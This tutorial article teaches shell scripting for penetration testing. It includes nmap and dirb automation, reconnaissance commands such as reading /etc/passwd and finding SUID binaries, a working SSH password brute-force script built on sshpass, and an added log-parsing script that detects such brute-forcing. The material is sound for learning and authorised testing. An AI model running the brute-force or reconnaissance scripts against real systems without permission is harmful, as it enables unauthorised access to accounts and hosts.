How to Use Shell Scripting for Penetration Testing

Penetration testing (or ethical hacking) is a critical process for identifying security vulnerabilities in systems and networks. While many penetration testers rely on advanced tools, shell scripting can be an invaluable skill to automate tasks, improve efficiency, and develop custom security tests.

In this article, we will explore how to use shell scripting for penetration testing, covering basic commands, automation techniques, and real-world examples.

Basic Shell Scripting for Pentesting

Before moving on to advanced penetration testing scripts, it is important to understand the basics of shell scripting.

1. Writing a Simple Shell Script

A shell script is a text file containing a series of commands. You can create a script using any text editor, such as nano or vim.

#!/bin/bash
# This is a simple shell script

echo "Hello, this is a penetration testing script!"

Save this script as test.sh, then give it execution permission and run it:

chmod +x test.sh
./test.sh

Useful Linux Commands for Penetration Testing

Shell scripts leverage Linux commands to perform penetration testing tasks. Here are some essential commands:

Network Scanning:

nmap -sV -p 80,443 <target_ip>

(Scans ports 80 and 443 for service versions.)

Finding Open Ports:

netstat -tulnp | grep LISTEN

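(Lists listening TCP sockets on the local system. The grep for LISTEN drops the UDP sockets that -u selects, because UDP has no LISTEN state.)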

Checking Users and Permissions:

cat /etc/passwd

(Lists system users.)

Finding SUID Binaries:

find / -perm -4000 -type f 2>/dev/null

(Finds binaries with the SUID bit set. These run with the file owner's privileges, so a vulnerable or misconfigured one can be exploited.)

Automating Penetration Testing Tasks

Shell scripting allows you to automate tasks such as scanning, enumeration, and brute-force attacks. Below are some practical examples.

1. Automating Nmap Scans

Nmap is one of the most powerful tools for network scanning. You can automate multiple scans using a shell script.

#!/bin/bash
# Automated Nmap Scan

if [ "$#" -ne 1 ]; then
  echo "Usage: $0 <IP Address>"
  exit 1
fi

echo "Scanning target: $1"
# Quote the argument so the shell does not split or glob it
nmap -A -T4 "$1" > scan_results.txt
echo "Scan completed. Results saved in scan_results.txt"

2. Checking for Weak Passwords (Brute Force Attack)

A simple shell script to test SSH login credentials using a wordlist:

#!/bin/bash
# SSH Brute Force Attack Script

if [ "$#" -ne 2 ]; then
  echo "Usage: $0 <IP> <username>"
  exit 1
fi

IP=$1
USER=$2
WORDLIST="passwords.txt"

# IFS= and -r keep each wordlist line exactly as written
while IFS= read -r password; do
  echo "Trying password: $password"
  sshpass -p "$password" ssh -o StrictHostKeyChecking=no "$USER@$IP" exit && echo "Password Found: $password" && break
done < "$WORDLIST"

(Note: Use this ethically with permission.)
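
On the target, a loop like this shows up as a burst of "Failed password" lines from one source address in the sshd log. The script below is an added example, not part of the original article: it counts failures per source IP and marks addresses where a successful login followed. The function name, the threshold and the sample log lines are assumptions constructed for illustration.

```shell
#!/bin/bash
# Added example: detect the log pattern left by a wordlist loop against SSH.

# Constructed sample lines in OpenSSH syslog format. Addresses come from the
# RFC 5737 documentation ranges; this is not real log data.
SAMPLE_LOG='Mar  3 10:15:01 web01 sshd[2201]: Failed password for admin from 203.0.113.7 port 50122 ssh2
Mar  3 10:15:03 web01 sshd[2203]: Failed password for admin from 203.0.113.7 port 50124 ssh2
Mar  3 10:15:04 web01 sshd[2204]: Failed password for invalid user test from 198.51.100.9 port 41000 ssh2
Mar  3 10:15:05 web01 sshd[2205]: Failed password for admin from 203.0.113.7 port 50126 ssh2
Mar  3 10:15:07 web01 sshd[2207]: Accepted password for admin from 203.0.113.7 port 50128 ssh2
Mar  3 10:20:00 web01 sshd[2300]: Accepted password for deploy from 192.0.2.20 port 40022 ssh2'

# detect_ssh_bruteforce THRESHOLD  (hypothetical helper name)
# Reads sshd log lines on stdin and prints "<ip> <failures> <status>" for every
# source address with at least THRESHOLD failed password attempts.
detect_ssh_bruteforce() {
  awk -v min="$1" '
    # Fields are read from the END of the line ("from <ip> port <n> ssh2"),
    # because the username earlier in the line is chosen by the client and
    # may itself contain spaces or the word "from".
    NF >= 6 && $(NF-4) == "from" && $(NF-2) == "port" {
      ip = $(NF-3)
      if ($0 ~ /sshd\[[0-9]+\]: Failed password for /) {
        fails[ip]++
      } else if ($0 ~ /sshd\[[0-9]+\]: Accepted password for /) {
        # A success only matters here if it follows enough failures.
        if ((ip in fails) && fails[ip] >= min) hit[ip] = 1
      }
    }
    END {
      for (ip in fails)
        if (fails[ip] >= min)
          print ip, fails[ip], ((ip in hit) ? "login-succeeded" : "no-login")
    }
  ' | sort
}

# Demo run on the constructed sample with a threshold of 3 failures.
printf '%s\n' "$SAMPLE_LOG" | detect_ssh_bruteforce 3
```

A "login-succeeded" row is the case to triage first, since it means a guessed password worked after the failures.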

3. Automating Directory Enumeration

A script to automate web directory brute forcing using dirb:

#!/bin/bash
# Directory Enumeration Script

if [ "$#" -ne 1 ]; then
  echo "Usage: $0 <URL>"
  exit 1
fi

echo "Starting directory enumeration on $1"
# Quote the URL so characters such as & or ? are passed through intact
dirb "$1" /usr/share/wordlists/dirb/common.txt

4. Extracting System Information

This script collects critical system details:

#!/bin/bash
# System Information Gathering Script

echo "Collecting system information..."
echo "Kernel Version: $(uname -r)"
echo "Current User: $(whoami)"
echo "Hostname: $(hostname)"
echo "Network Interfaces:"
ifconfig

Conclusion

Shell scripting is a powerful tool for penetration testers. By automating common security tasks like scanning, enumeration, and brute-force attacks, security professionals can enhance their efficiency and effectiveness. Learning how to use shell scripts for penetration testing allows ethical hackers to customize their testing methodologies and uncover vulnerabilities more effectively.

Whether you’re a beginner or an experienced penetration tester, integrating shell scripting into your workflow can greatly enhance your security assessments. Start with basic scripts, experiment with automation, and continuously refine your approach to ethical hacking.

By following the above methods, you can leverage shell scripting for penetration testing and improve your cybersecurity skills. Happy ethical hacking!
